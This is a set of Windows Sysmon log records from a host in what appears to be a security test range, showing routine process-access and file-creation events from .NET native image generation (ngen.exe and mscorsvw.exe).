{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.012\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-00106B400F00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.012","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-00106B400F00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.012\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-00106B400F00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.012","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-00106B400F00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:47.215\r\nProcessGuid: {A837DB8D-0497-5F25-0000-00106B400F00}\r\nProcessId: 4424\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1148-0\\PresentationFramework.Classic.dll\r\nCreationUtcTime: 2020-08-01 05:58:47.215","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:47.215","ProcessGuid":"{A837DB8D-0497-5F25-0000-00106B400F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1148-0\\PresentationFramework.Classic.dll","CreationUtcTime":"2020-08-01 05:58:47.215","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.262\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-00103D450F00}\r\nTargetProcessId: 888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.262","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-00103D450F00}","TargetProcessId":"888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-00103D450F00}\r\nTargetProcessId: 888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-00103D450F00}","TargetProcessId":"888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.262\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0497-5F25-0000-00103D450F00}\r\nTargetProcessId: 888\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.262","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0497-5F25-0000-00103D450F00}","TargetProcessId":"888","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.324\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105F7A0E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.324","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105F7A0E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105F7A0E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105F7A0E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:47.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-00105F7A0E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:47.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-00105F7A0E00}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
